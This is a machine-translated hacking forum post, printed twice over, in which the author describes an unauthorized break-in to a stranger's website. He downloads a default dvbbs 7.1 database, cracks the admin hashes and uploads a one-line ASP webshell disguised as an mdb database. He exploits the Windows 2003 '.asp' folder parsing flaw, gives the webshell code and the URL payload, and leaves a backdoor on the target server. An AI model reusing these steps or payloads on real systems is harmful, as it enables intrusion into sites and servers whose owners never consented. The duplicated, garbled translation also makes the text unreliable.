Reprinted from: /?tid=565
Author: firefox+lvhuana
When I was online this morning, I was very bored and my friends were not online.
When I was bored, the QQ suddenly rang. A stranger wanted to add me and read his information first. Oh, it turns out that this person has a personal website, so I requested it through him. Then I started to look at his personal site. It turned out to be a plug-in site. I was confused. What did the people from the plug-in site do to add me? . . .
Think about entering his site and check it out. Open Ming Xiaozi's side note tool version 2.2 (this startup speed is fast, I like it), scan it, and see that there are several sites on the server where his site is located. After scanning it carefully, I found that the database of a dvbbs7.1 forum is the default. Download it, and then the anti-virus software checks that there is no * (now some boring people like to put a * with the default database name to fish.. Be careful), open the database and find the administrator's backend account password and frontend account password hash, crack it, have good luck, the hash of md5 has been cracked in a few minutes, and the full digital frontend password is.
Log in, then log in to the background. I haven't started a domestic site for a long time, I'm in the process of my hand. . . . Old idea: upload an asp statement made by yourself and insert an asp * in a gif picture (of course, it has been changed to .gif). The upload was successful, and then went to the background to restore the database. It was dizzy. Why did it prompt the unrecognized database format? It failed. . It seems that Dongwang is much more mature now, so it probably has identified the head of the file? ? Let's find a way. .
I saw that the 7.1 version now has blog function, so I check the blog settings in the background. I suddenly saw that there are upload settings, and I can also set the upload type and add an mdb file format. It is not bad, and it increases success. Then build an empty mdb database locally, with the contents of <%eval(request(\"lv\"))%>, then upload the database, upload it successfully, and then dizzy, why don't you directly display the relative path? but fileid=1. . Then I went to the blog management in the background to look for it. I found that the uploaded folder was Boke/UploadFile/, and then found the mdb file I uploaded in the upload management. Now, can Dongwang still prohibit me from restoring the database! ?
The database was successfully restored to .asp, hehe, a webshell was obtained, and then entered the server and found that it was win2k3. It seems that there is no chance to execute cmd. After walking around, I found the d disk and it can actually traverse it. There is also ser-u installed on the d disk. I browsed and found the physical path of the target station, jumped to the directory of the target station, and left the back door. Okay, I finished playing and retreat.
Given that it is from win2k3 system, everyone should know that if a folder name of win2k3 is .asp, any files in this folder will be processed as asp. Let's test it in depth. Change the backup path in the background backup and change it to .asp/. If you are afraid of failure, encode the url., that is, %2easp/, and then back up the database. This will get a .asp directory, and then set the file upload directory to .asp/ in the upload settings. In this way, all files will be uploaded to this folder. Back to the front desk, upload my one-sentence * to insert a sentence * into the gif file. After the upload is successful, http://www.****.com/.asp/2006-2/ is our shell. Connect with the client and get a 2006 webshell. However, after entering the password, it will return a 404 error. The reason is that ie omitted the .asp after omitting it, and put http://www.******.com/.asp/2006-2/ in front of ?%23=Execute(Session(%22%23%22))&pageName=PageList. After seeing it, the webshell can be used normally.
There may be other simpler methods for spam articles, I hope anyone knows to tell me.
Author: firefox+lvhuana
When I was online this morning, I was very bored and my friends were not online.
When I was bored, the QQ suddenly rang. A stranger wanted to add me and read his information first. Oh, it turns out that this person has a personal website, so I requested it through him. Then I started to look at his personal site. It turned out to be a plug-in site. I was confused. What did the people from the plug-in site do to add me? . . .
Think about entering his site and check it out. Open Ming Xiaozi's side note tool version 2.2 (this startup speed is fast, I like it), scan it, and see that there are several sites on the server where his site is located. After scanning it carefully, I found that the database of a dvbbs7.1 forum is the default. Download it, and then the anti-virus software checks that there is no * (now some boring people like to put a * with the default database name to fish.. Be careful), open the database and find the administrator's backend account password and frontend account password hash, crack it, have good luck, the hash of md5 has been cracked in a few minutes, and the full digital frontend password is.
Log in, then log in to the background. I haven't started a domestic site for a long time, I'm in the process of my hand. . . . Old idea: upload an asp statement made by yourself and insert an asp * in a gif picture (of course, it has been changed to .gif). The upload was successful, and then went to the background to restore the database. It was dizzy. Why did it prompt the unrecognized database format? It failed. . It seems that Dongwang is much more mature now, so it probably has identified the head of the file? ? Let's find a way. .
I saw that the 7.1 version now has blog function, so I check the blog settings in the background. I suddenly saw that there are upload settings, and I can also set the upload type and add an mdb file format. It is not bad, and it increases success. Then build an empty mdb database locally, with the contents of <%eval(request(\"lv\"))%>, then upload the database, upload it successfully, and then dizzy, why don't you directly display the relative path? but fileid=1. . Then I went to the blog management in the background to look for it. I found that the uploaded folder was Boke/UploadFile/, and then found the mdb file I uploaded in the upload management. Now, can Dongwang still prohibit me from restoring the database! ?
The database was successfully restored to .asp, hehe, a webshell was obtained, and then entered the server and found that it was win2k3. It seems that there is no chance to execute cmd. After walking around, I found the d disk and it can actually traverse it. There is also ser-u installed on the d disk. I browsed and found the physical path of the target station, jumped to the directory of the target station, and left the back door. Okay, I finished playing and retreat.
Given that it is from win2k3 system, everyone should know that if a folder name of win2k3 is .asp, any files in this folder will be processed as asp. Let's test it in depth. Change the backup path in the background backup and change it to .asp/. If you are afraid of failure, encode the url., that is, %2easp/, and then back up the database. This will get a .asp directory, and then set the file upload directory to .asp/ in the upload settings. In this way, all files will be uploaded to this folder. Back to the front desk, upload my one-sentence * to insert a sentence * into the gif file. After the upload is successful, http://www.****.com/.asp/2006-2/ is our shell. Connect with the client and get a 2006 webshell. However, after entering the password, it will return a 404 error. The reason is that ie omitted the .asp after omitting it, and put http://www.******.com/.asp/2006-2/ in front of ?%23=Execute(Session(%22%23%22))&pageName=PageList. After seeing it, the webshell can be used normally.
There may be other simpler methods for spam articles, I hope anyone knows to tell me.